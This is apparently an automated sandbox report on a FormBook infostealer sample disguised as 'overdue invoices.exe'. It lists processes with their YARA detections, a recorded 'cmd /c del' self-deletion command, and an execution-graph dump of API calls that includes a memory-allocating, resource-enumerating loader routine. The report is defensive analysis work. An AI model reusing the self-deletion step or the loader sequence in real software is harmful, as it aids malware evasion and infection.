                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Target ID:5
                Start time:15:18:59
                Start date:28/01/2022
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Explorer.EXE
                Imagebase:0x7ff6f22f0000
                File size:3933184 bytes
                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:high

                General

                Target ID:11
                Start time:15:19:38
                Start date:28/01/2022
                Path:C:\Windows\SysWOW64\svchost.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\svchost.exe
                Imagebase:0x7ff6b7590000
                File size:44520 bytes
                MD5 hash:FA6C268A5B5BDA067A901764D203D433
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:high

                General

                Target ID:12
                Start time:15:19:41
                Start date:28/01/2022
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:/c del "C:\Users\user\Desktop\overdue invoices.exe"
                Imagebase:0x2a0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:14
                Start time:15:19:42
                Start date:28/01/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff61de10000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:20
                Start time:15:20:16
                Start date:28/01/2022
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                Imagebase:0x7ff6f22f0000
                File size:3933184 bytes
                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:14%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:22.6%
                  Total number of Nodes:1254
                  Total number of Limit Nodes:25
                  execution_graph 4123 401cc1 GetDlgItem GetClientRect 4124 4029e8 18 API calls 4123->4124 4125 401cf1 LoadImageA SendMessageA 4124->4125 4126 40287d 4125->4126 4127 401d0f DeleteObject 4125->4127 4127->4126 4128 401dc1 4129 4029e8 18 API calls 4128->4129 4130 401dc7 4129->4130 4131 4029e8 18 API calls 4130->4131 4132 401dd0 4131->4132 4133 4029e8 18 API calls 4132->4133 4134 401dd9 4133->4134 4135 4029e8 18 API calls 4134->4135 4136 401de2 4135->4136 4137 401423 25 API calls 4136->4137 4138 401de9 ShellExecuteA 4137->4138 4139 401e16 4138->4139 4140 401ec5 4141 4029e8 18 API calls 4140->4141 4142 401ecc GetFileVersionInfoSizeA 4141->4142 4143 401eef GlobalAlloc 4142->4143 4144 401f45 4142->4144 4143->4144 4145 401f03 GetFileVersionInfoA 4143->4145 4145->4144 4146 401f14 VerQueryValueA 4145->4146 4146->4144 4147 401f2d 4146->4147 4151 4059e3 wsprintfA 4147->4151 4149 401f39 4152 4059e3 wsprintfA 4149->4152 4151->4149 4152->4144 4153 4014ca 4154 404e23 25 API calls 4153->4154 4155 4014d1 4154->4155 3512 403f4b lstrcpynA lstrlenA 3513 40604c 3519 405ed0 3513->3519 3514 40683b 3515 405f51 GlobalFree 3516 405f5a GlobalAlloc 3515->3516 3516->3514 3516->3519 3517 405fd1 GlobalAlloc 3517->3514 3517->3519 3518 405fc8 GlobalFree 3518->3517 3519->3514 3519->3515 3519->3516 3519->3517 3519->3518 2948 401f51 2949 401f63 2948->2949 2950 402004 2948->2950 2969 4029e8 2949->2969 2952 401423 25 API calls 2950->2952 2958 40215b 2952->2958 2954 4029e8 18 API calls 2955 401f73 2954->2955 2956 401f88 LoadLibraryExA 2955->2956 2957 401f7b GetModuleHandleA 2955->2957 2956->2950 2959 401f98 GetProcAddress 2956->2959 2957->2956 2957->2959 2960 401fe5 2959->2960 2961 401fa8 2959->2961 2986 404e23 2960->2986 2963 401fb0 2961->2963 2964 401fc7 2961->2964 2983 401423 2963->2983 2975 735e1000 VirtualAlloc 2964->2975 2966 401fb8 2966->2958 2967 401ff8 FreeLibrary 2966->2967 2967->2958 2970 4029f4 2969->2970 2997 405aa7 2970->2997 2973 401f6a 2973->2954 2976 735e4c77 2975->2976 2977 735e1060 2975->2977 2976->2966 2977->2977 2978 735e1068 GetTempPathW 2977->2978 3037 735e4c80 2978->3037 2980 735e108a CreateFileW GetFileSize VirtualAlloc ReadFile 2981 735e10d8 2980->2981 2982 735e10f1 EnumResourceTypesA 2980->2982 2981->2981 2981->2982 2982->2976 2984 404e23 25 API calls 2983->2984 2985 401431 2984->2985 2985->2966 2987 404e3e 2986->2987 2995 404ee1 2986->2995 2988 404e5b lstrlenA 2987->2988 2989 405aa7 18 API calls 2987->2989 2990 404e84 2988->2990 2991 404e69 lstrlenA 2988->2991 2989->2988 2993 404e97 2990->2993 2994 404e8a SetWindowTextA 2990->2994 2992 404e7b lstrcatA 2991->2992 2991->2995 2992->2990 2993->2995 2996 404e9d SendMessageA SendMessageA SendMessageA 2993->2996 2994->2993 2995->2966 2996->2995 3002 405ab4 2997->3002 2998 405cca 2999 402a15 2998->2999 3032 405a85 lstrcpynA 2998->3032 2999->2973 3016 405ce3 2999->3016 3001 405b48 GetVersion 3014 405b55 3001->3014 3002->2998 3002->3001 3003 405ca1 lstrlenA 3002->3003 3005 405aa7 10 API calls 3002->3005 3010 405ce3 5 API calls 3002->3010 3030 4059e3 wsprintfA 3002->3030 3031 405a85 lstrcpynA 3002->3031 3003->3002 3005->3003 3008 405bc0 GetSystemDirectoryA 3008->3014 3009 405bd3 GetWindowsDirectoryA 3009->3014 3010->3002 3011 405aa7 10 API calls 3011->3014 3012 405c4a lstrcatA 3012->3002 3013 405c07 SHGetSpecialFolderLocation 3013->3014 3015 405c1f SHGetPathFromIDListA CoTaskMemFree 3013->3015 3014->3002 3014->3008 3014->3009 3014->3011 3014->3012 3014->3013 3025 40596c RegOpenKeyExA 3014->3025 3015->3014 3017 405cef 3016->3017 3019 405d4c CharNextA 3017->3019 3021 405d57 3017->3021 3023 405d3a CharNextA 3017->3023 3024 405d47 CharNextA 3017->3024 3033 4055a3 3017->3033 3018 405d5b CharPrevA 3018->3021 3019->3017 3019->3021 3021->3018 3022 405d76 3021->3022 3022->2973 3023->3017 3024->3019 3026 4059dd 3025->3026 3027 40599f RegQueryValueExA 3025->3027 3026->3014 3028 4059c0 RegCloseKey 3027->3028 3028->3026 3030->3002 3031->3002 3032->2999 3034 4055a9 3033->3034 3035 4055bc 3034->3035 3036 4055af CharNextA 3034->3036 3035->3017 3036->3034 3038 735e4c8f 3037->3038 3038->2980 3038->3038 4156 4014d6 4157 4029cb 18 API calls 4156->4157 4158 4014dc Sleep 4157->4158 4160 40287d 4158->4160 3527 401a58 3532 4029cb 3527->3532 3529 401a5f 3530 4029cb 18 API calls 3529->3530 3531 401a68 3530->3531 3533 405aa7 18 API calls 3532->3533 3534 4029df 3533->3534 3534->3529 3535 402858 SendMessageA 3536 402872 InvalidateRect 3535->3536 3537 40287d 3535->3537 3536->3537 4161 4018d8 4162 40190f 4161->4162 4163 4029e8 18 API calls 4162->4163 4164 401914 4163->4164 4165 4053aa 68 API calls 4164->4165 4166 40191d 4165->4166 3538 402259 3539 4029e8 18 API calls 3538->3539 3540 402267 3539->3540 3541 4029e8 18 API calls 3540->3541 3542 402270 3541->3542 3543 4029e8 18 API calls 3542->3543 3544 40227a GetPrivateProfileStringA 3543->3544 3545 40155b 3546 401577 ShowWindow 3545->3546 3547 40157e 3545->3547 3546->3547 3548 40158c ShowWindow 3547->3548 3549 40287d 3547->3549 3548->3549 4167 4018db 4168 4029e8 18 API calls 4167->4168 4169 4018e2 4168->4169 4170 405346 MessageBoxIndirectA 4169->4170 4171 4018eb 4170->4171 3550 404f61 3551 404f82 GetDlgItem GetDlgItem GetDlgItem 3550->3551 3552 40510d 3550->3552 3596 403e6c SendMessageA 3551->3596 3554 405116 GetDlgItem CreateThread CloseHandle 3552->3554 3555 40513e 3552->3555 3554->3555 3557 405155 ShowWindow ShowWindow 3555->3557 3558 40518b 3555->3558 3559 405169 3555->3559 3556 404ff3 3562 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 3556->3562 3601 403e6c SendMessageA 3557->3601 3605 403e9e 3558->3605 3560 4051c7 3559->3560 3564 4051a0 ShowWindow 3559->3564 3565 40517a 3559->3565 3560->3558 3571 4051d2 SendMessageA 3560->3571 3569 405069 3562->3569 3570 40504d SendMessageA SendMessageA 3562->3570 3567 4051c0 3564->3567 3568 4051b2 3564->3568 3602 403e10 3565->3602 3566 405199 3574 403e10 SendMessageA 3567->3574 3573 404e23 25 API calls 3568->3573 3575 40507c 3569->3575 3576 40506e SendMessageA 3569->3576 3570->3569 3571->3566 3577 4051eb CreatePopupMenu 3571->3577 3573->3567 3574->3560 3597 403e37 3575->3597 3576->3575 3578 405aa7 18 API calls 3577->3578 3580 4051fb AppendMenuA 3578->3580 3582 405221 3580->3582 3583 40520e GetWindowRect 3580->3583 3581 40508c 3584 405095 ShowWindow 3581->3584 3585 4050c9 GetDlgItem SendMessageA 3581->3585 3587 40522a TrackPopupMenu 3582->3587 3583->3587 3588 4050b8 3584->3588 3589 4050ab ShowWindow 3584->3589 3585->3566 3586 4050f0 SendMessageA SendMessageA 3585->3586 3586->3566 3587->3566 3590 405248 3587->3590 3600 403e6c SendMessageA 3588->3600 3589->3588 3591 405264 SendMessageA 3590->3591 3591->3591 3593 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3591->3593 3594 4052a3 SendMessageA 3593->3594 3594->3594 3595 4052c4 GlobalUnlock SetClipboardData CloseClipboard 3594->3595 3595->3566 3596->3556 3598 405aa7 18 API calls 3597->3598 3599 403e42 SetDlgItemTextA 3598->3599 3599->3581 3600->3585 3601->3559 3603 403e17 3602->3603 3604 403e1d SendMessageA 3602->3604 3603->3604 3604->3558 3606 403eb6 GetWindowLongA 3605->3606 3616 403f3f 3605->3616 3607 403ec7 3606->3607 3606->3616 3608 403ed6 GetSysColor 3607->3608 3609 403ed9 3607->3609 3608->3609 3610 403ee9 SetBkMode 3609->3610 3611 403edf SetTextColor 3609->3611 3612 403f01 GetSysColor 3610->3612 3613 403f07 3610->3613 3611->3610 3612->3613 3614 403f18 3613->3614 3615 403f0e SetBkColor 3613->3615 3614->3616 3617 403f32 CreateBrushIndirect 3614->3617 3618 403f2b DeleteObject 3614->3618 3615->3614 3616->3566 3617->3616 3618->3617 3619 403964 3620 403ab7 3619->3620 3621 40397c 3619->3621 3623 403b08 3620->3623 3624 403ac8 GetDlgItem GetDlgItem 3620->3624 3621->3620 3622 403988 3621->3622 3626 403993 SetWindowPos 3622->3626 3627 4039a6 3622->3627 3625 403b62 3623->3625 3633 401389 2 API calls 3623->3633 3628 403e37 19 API calls 3624->3628 3629 403e83 SendMessageA 3625->3629 3649 403ab2 3625->3649 3626->3627 3630 4039c3 3627->3630 3631 4039ab ShowWindow 3627->3631 3632 403af2 SetClassLongA 3628->3632 3655 403b74 3629->3655 3634 4039e5 3630->3634 3635 4039cb DestroyWindow 3630->3635 3631->3630 3636 40140b 2 API calls 3632->3636 3637 403b3a 3633->3637 3638 4039ea SetWindowLongA 3634->3638 3639 4039fb 3634->3639 3686 403dc0 3635->3686 3636->3623 3637->3625 3642 403b3e SendMessageA 3637->3642 3638->3649 3640 403a72 3639->3640 3641 403a07 GetDlgItem 3639->3641 3647 403e9e 8 API calls 3640->3647 3645 403a37 3641->3645 3646 403a1a SendMessageA IsWindowEnabled 3641->3646 3642->3649 3643 40140b 2 API calls 3643->3655 3644 403dc2 DestroyWindow EndDialog 3644->3686 3651 403a44 3645->3651 3652 403a8b SendMessageA 3645->3652 3653 403a57 3645->3653 3661 403a3c 3645->3661 3646->3645 3646->3649 3647->3649 3648 403df1 ShowWindow 3648->3649 3650 405aa7 18 API calls 3650->3655 3651->3652 3651->3661 3652->3640 3656 403a74 3653->3656 3657 403a5f 3653->3657 3654 403e10 SendMessageA 3654->3640 3655->3643 3655->3644 3655->3649 3655->3650 3658 403e37 19 API calls 3655->3658 3662 403e37 19 API calls 3655->3662 3677 403d02 DestroyWindow 3655->3677 3659 40140b 2 API calls 3656->3659 3660 40140b 2 API calls 3657->3660 3658->3655 3659->3661 3660->3661 3661->3640 3661->3654 3663 403bef GetDlgItem 3662->3663 3664 403c04 3663->3664 3665 403c0c ShowWindow EnableWindow 3663->3665 3664->3665 3687 403e59 EnableWindow 3665->3687 3667 403c36 EnableWindow 3670 403c4a 3667->3670 3668 403c4f GetSystemMenu EnableMenuItem SendMessageA 3669 403c7f SendMessageA 3668->3669 3668->3670 3669->3670 3670->3668 3688 403e6c SendMessageA 3670->3688 3689 405a85 lstrcpynA 3670->3689 3673 403cad lstrlenA 3674 405aa7 18 API calls 3673->3674 3675 403cbe SetWindowTextA 3674->3675 3676 401389 2 API calls 3675->3676 3676->3655 3678 403d1c CreateDialogParamA 3677->3678 3677->3686 3679 403d4f 3678->3679 3678->3686 3680 403e37 19 API calls 3679->3680 3681 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3680->3681 3682 401389 2 API calls 3681->3682 3683 403da0 3682->3683 3683->3649 3684 403da8 ShowWindow 3683->3684 3685 403e83 SendMessageA 3684->3685 3685->3686 3686->3648 3686->3649 3687->3667 3688->3670 3689->3673 3690 402164 3691 4029e8 18 API calls 3690->3691 3692 40216a 3691->3692 3693 4029e8 18 API calls 3692->3693 3694 402173 3693->3694 3695 4029e8 18 API calls 3694->3695 3696 40217c 3695->3696 3697 405d7c 2 API calls 3696->3697 3698 402185 3697->3698 3699 402196 lstrlenA lstrlenA 3698->3699 3703 402189 3698->3703 3701 404e23 25 API calls 3699->3701 3700 404e23 25 API calls 3704 402191 3700->3704 3702 4021d2 SHFileOperationA 3701->3702 3702->3703 3702->3704 3703->3700 3703->3704 4172 4019e6 4173 4029e8 18 API calls 4172->4173 4174 4019ef ExpandEnvironmentStringsA 4173->4174 4175 401a03 4174->4175 4177 401a16 4174->4177 4176 401a08 lstrcmpA 4175->4176 4175->4177 4176->4177 4178 4021e6 4179 402200 4178->4179 4180 4021ed 4178->4180 4181 405aa7 18 API calls 4180->4181 4182 4021fa 4181->4182 4183 405346 MessageBoxIndirectA 4182->4183 4183->4179 3705 401c6d 3706 4029cb 18 API calls 3705->3706 3707 401c73 IsWindow 3706->3707 3708 4019d6 3707->3708 4191 4025ed 4192 40287d 4191->4192 4193 4025f4 4191->4193 4194 4025fa FindClose 4193->4194 4194->4192 3709 40266e 3710 4029e8 18 API calls 3709->3710 3712 40267c 3710->3712 3711 402692 3714 40573d 2 API calls 3711->3714 3712->3711 3713 4029e8 18 API calls 3712->3713 3713->3711 3715 402698 3714->3715 3735 40575c GetFileAttributesA CreateFileA 3715->3735 3717 4026a5 3718 4026b1 GlobalAlloc 3717->3718 3719 40274e 3717->3719 3720 402745 CloseHandle 3718->3720 3721 4026ca 3718->3721 3722 402756 DeleteFileA 3719->3722 3723 402769 3719->3723 3720->3719 3736 4031da SetFilePointer 3721->3736 3722->3723 3725 4026d0 3726 4031a8 ReadFile 3725->3726 3727 4026d9 GlobalAlloc 3726->3727 3728 4026e9 3727->3728 3729 40271d WriteFile GlobalFree 3727->3729 3731 402f01 47 API calls 3728->3731 3730 402f01 47 API calls 3729->3730 3732 402742 3730->3732 3734 4026f6 3731->3734 3732->3720 3733 402714 GlobalFree 3733->3729 3734->3733 3735->3717 3736->3725 3737 40276f 3738 4029cb 18 API calls 3737->3738 3739 402775 3738->3739 3740 4027b0 3739->3740 3741 402799 3739->3741 3750 40264e 3739->3750 3744 4027c6 3740->3744 3745 4027ba 3740->3745 3742 4027ad 3741->3742 3743 40279e 3741->3743 3752 4059e3 wsprintfA 3742->3752 3751 405a85 lstrcpynA 3743->3751 3747 405aa7 18 API calls 3744->3747 3746 4029cb 18 API calls 3745->3746 3746->3750 3747->3750 3751->3750 3752->3750 4195 4014f0 SetForegroundWindow 4196 40287d 4195->4196 3753 404772 GetDlgItem GetDlgItem 3754 4047c6 7 API calls 3753->3754 3759 4049e3 3753->3759 3755 40486c DeleteObject 3754->3755 3756 40485f SendMessageA 3754->3756 3757 404877 3755->3757 3756->3755 3758 4048ae 3757->3758 3762 405aa7 18 API calls 3757->3762 3760 403e37 19 API calls 3758->3760 3767 404acd 3759->3767 3785 404a57 3759->3785 3806 4046f2 SendMessageA 3759->3806 3766 4048c2 3760->3766 3761 404b7c 3763 404b91 3761->3763 3764 404b85 SendMessageA 3761->3764 3765 404890 SendMessageA SendMessageA 3762->3765 3773 404ba3 ImageList_Destroy 3763->3773 3774 404baa 3763->3774 3787 404bba 3763->3787 3764->3763 3765->3757 3770 403e37 19 API calls 3766->3770 3767->3761 3771 404b26 SendMessageA 3767->3771 3794 4049d6 3767->3794 3768 404abf SendMessageA 3768->3767 3786 4048d0 3770->3786 3776 404b3b SendMessageA 3771->3776 3771->3794 3772 403e9e 8 API calls 3777 404d6c 3772->3777 3773->3774 3778 404bb3 GlobalFree 3774->3778 3774->3787 3775 404d20 3782 404d32 ShowWindow GetDlgItem ShowWindow 3775->3782 3775->3794 3780 404b4e 3776->3780 3778->3787 3779 4049a4 GetWindowLongA SetWindowLongA 3781 4049bd 3779->3781 3792 404b5f SendMessageA 3780->3792 3783 4049c3 ShowWindow 3781->3783 3784 4049db 3781->3784 3782->3794 3804 403e6c SendMessageA 3783->3804 3805 403e6c SendMessageA 3784->3805 3785->3767 3785->3768 3786->3779 3790 40491f SendMessageA 3786->3790 3793 40499e 3786->3793 3795 40495b SendMessageA 3786->3795 3796 40496c SendMessageA 3786->3796 3787->3775 3791 40140b 2 API calls 3787->3791 3800 404bec 3787->3800 3790->3786 3791->3800 3792->3761 3793->3779 3793->3781 3794->3772 3795->3786 3796->3786 3797 404cf6 InvalidateRect 3797->3775 3798 404d0c 3797->3798 3811 404610 3798->3811 3799 404c1a SendMessageA 3803 404c30 3799->3803 3800->3799 3800->3803 3802 404ca4 SendMessageA SendMessageA 3802->3803 3803->3797 3803->3802 3804->3794 3805->3759 3807 404751 SendMessageA 3806->3807 3808 404715 GetMessagePos ScreenToClient SendMessageA 3806->3808 3809 404749 3807->3809 3808->3809 3810 40474e 3808->3810 3809->3785 3810->3807 3812 40462a 3811->3812 3813 405aa7 18 API calls 3812->3813 3814 40465f 3813->3814 3815 405aa7 18 API calls 3814->3815 3816 40466a 3815->3816 3817 405aa7 18 API calls 3816->3817 3818 40469b lstrlenA wsprintfA SetDlgItemTextA 3817->3818 3818->3775 3819 404d73 3820 404d81 3819->3820 3821 404d98 3819->3821 3822 404d87 3820->3822 3837 404e01 3820->3837 3823 404da6 IsWindowVisible 3821->3823 3829 404dbd 3821->3829 3824 403e83 SendMessageA 3822->3824 3826 404db3 3823->3826 3823->3837 3827 404d91 3824->3827 3825 404e07 CallWindowProcA 3825->3827 3828 4046f2 5 API calls 3826->3828 3828->3829 3829->3825 3838 405a85 lstrcpynA 3829->3838 3831 404dec 3839 4059e3 wsprintfA 3831->3839 3833 404df3 3834 40140b 2 API calls 3833->3834 3835 404dfa 3834->3835 3840 405a85 lstrcpynA 3835->3840 3837->3825 3838->3831 3839->3833 3840->3837 3841 404275 3842 4042b3 3841->3842 3843 4042a6 3841->3843 3845 4042bc GetDlgItem 3842->3845 3851 40431f 3842->3851 3902 40532a GetDlgItemTextA 3843->3902 3848 4042d0 3845->3848 3846 404403 3852 40458f 3846->3852 3904 40532a GetDlgItemTextA 3846->3904 3847 4042ad 3849 405ce3 5 API calls 3847->3849 3850 4042e4 SetWindowTextA 3848->3850 3855 40560c 4 API calls 3848->3855 3849->3842 3856 403e37 19 API calls 3850->3856 3851->3846 3851->3852 3857 405aa7 18 API calls 3851->3857 3854 403e9e 8 API calls 3852->3854 3859 4045a3 3854->3859 3860 4042da 3855->3860 3861 404302 3856->3861 3862 404395 SHBrowseForFolderA 3857->3862 3858 40442f 3863 405659 18 API calls 3858->3863 3860->3850 3867 405578 3 API calls 3860->3867 3864 403e37 19 API calls 3861->3864 3862->3846 3865 4043ad CoTaskMemFree 3862->3865 3866 404435 3863->3866 3868 404310 3864->3868 3869 405578 3 API calls 3865->3869 3905 405a85 lstrcpynA 3866->3905 3867->3850 3903 403e6c SendMessageA 3868->3903 3871 4043ba 3869->3871 3874 4043f1 SetDlgItemTextA 3871->3874 3878 405aa7 18 API calls 3871->3878 3873 404318 3876 405da3 3 API calls 3873->3876 3874->3846 3875 40444c 3877 405da3 3 API calls 3875->3877 3876->3851 3884 404454 3877->3884 3880 4043d9 lstrcmpiA 3878->3880 3879 40448e 3906 405a85 lstrcpynA 3879->3906 3880->3874 3881 4043ea lstrcatA 3880->3881 3881->3874 3883 404497 3885 40560c 4 API calls 3883->3885 3884->3879 3889 4055bf 2 API calls 3884->3889 3890 4044e1 3884->3890 3886 40449d GetDiskFreeSpaceA 3885->3886 3888 4044bf MulDiv 3886->3888 3886->3890 3888->3890 3889->3884 3891 40453e 3890->3891 3893 404610 21 API calls 3890->3893 3892 404561 3891->3892 3894 40140b 2 API calls 3891->3894 3907 403e59 EnableWindow 3892->3907 3895 404530 3893->3895 3894->3892 3897 404540 SetDlgItemTextA 3895->3897 3898 404535 3895->3898 3897->3891 3900 404610 21 API calls 3898->3900 3899 40457d 3899->3852 3908 40420a 3899->3908 3900->3891 3902->3847 3903->3873 3904->3858 3905->3875 3906->3883 3907->3899 3909 404218 3908->3909 3910 40421d SendMessageA 3908->3910 3909->3910 3910->3852 4197 4022f5 4198 4022fb 4197->4198 4199 4029e8 18 API calls 4198->4199 4200 40230d 4199->4200 4201 4029e8 18 API calls 4200->4201 4202 402317 RegCreateKeyExA 4201->4202 4203 40287d 4202->4203 4205 402341 4202->4205 4204 402359 4207 402365 4204->4207 4210 4029cb 18 API calls 4204->4210 4205->4204 4206 4029e8 18 API calls 4205->4206 4209 402352 lstrlenA 4206->4209 4208 402380 RegSetValueExA 4207->4208 4211 402f01 47 API calls 4207->4211 4212 402396 RegCloseKey 4208->4212 4209->4204 4210->4207 4211->4208 4212->4203 4214 4027f5 4215 4029cb 18 API calls 4214->4215 4216 4027fb 4215->4216 4217 40282c 4216->4217 4218 40264e 4216->4218 4220 402809 4216->4220 4217->4218 4219 405aa7 18 API calls 4217->4219 4219->4218 4220->4218 4222 4059e3 wsprintfA 4220->4222 4222->4218 4223 4024f8 4224 4029cb 18 API calls 4223->4224 4227 402502 4224->4227 4225 402578 4226 402536 ReadFile 4226->4225 4226->4227 4227->4225 4227->4226 4228 40257a 4227->4228 4229 40258a 4227->4229 4232 4059e3 wsprintfA 4228->4232 4229->4225 4231 4025a0 SetFilePointer 4229->4231 4231->4225 4232->4225 4233 4016fa 4234 4029e8 18 API calls 4233->4234 4235 401701 SearchPathA 4234->4235 4236 40171c 4235->4236 4237 4014fe 4238 401506 4237->4238 4240 401519 4237->4240 4239 4029cb 18 API calls 4238->4239 4239->4240 3911 403f7f 3912 403f95 3911->3912 3917 4040a2 3911->3917 3914 403e37 19 API calls 3912->3914 3913 404111 3915 4041e5 3913->3915 3916 40411b GetDlgItem 3913->3916 3918 403feb 3914->3918 3922 403e9e 8 API calls 3915->3922 3919 404131 3916->3919 3920 4041a3 3916->3920 3917->3913 3917->3915 3923 4040e6 GetDlgItem SendMessageA 3917->3923 3921 403e37 19 API calls 3918->3921 3919->3920 3927 404157 6 API calls 3919->3927 3920->3915 3928 4041b5 3920->3928 3925 403ff8 CheckDlgButton 3921->3925 3926 4041e0 3922->3926 3942 403e59 EnableWindow 3923->3942 3940 403e59 EnableWindow 3925->3940 3927->3920 3931 4041bb SendMessageA 3928->3931 3932 4041cc 3928->3932 3929 40410c 3933 40420a SendMessageA 3929->3933 3931->3932 3932->3926 3935 4041d2 SendMessageA 3932->3935 3933->3913 3934 404016 GetDlgItem 3941 403e6c SendMessageA 3934->3941 3935->3926 3937 40402c SendMessageA 3938 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3937->3938 3939 40404a GetSysColor 3937->3939 3938->3926 3939->3938 3940->3934 3941->3937 3942->3929 3943 401000 3944 401037 BeginPaint GetClientRect 3943->3944 3947 40100c DefWindowProcA 3943->3947 3945 4010f3 3944->3945 3949 401073 CreateBrushIndirect FillRect DeleteObject 3945->3949 3950 4010fc 3945->3950 3948 401179 3947->3948 3949->3945 3951 401102 CreateFontIndirectA 3950->3951 3952 401167 EndPaint 3950->3952 3951->3952 3953 401112 6 API calls 3951->3953 3952->3948 3953->3952 3954 401b06 3955 401b13 3954->3955 3956 401b57 3954->3956 3957 4021ed 3955->3957 3965 401b2a 3955->3965 3958 401b80 GlobalAlloc 3956->3958 3959 401b5b 3956->3959 3961 405aa7 18 API calls 3957->3961 3960 405aa7 18 API calls 3958->3960 3962 401b9b 3959->3962 3975 405a85 lstrcpynA 3959->3975 3960->3962 3964 4021fa 3961->3964 3968 405346 MessageBoxIndirectA 3964->3968 3973 405a85 lstrcpynA 3965->3973 3966 401b6d GlobalFree 3966->3962 3968->3962 3969 401b39 3974 405a85 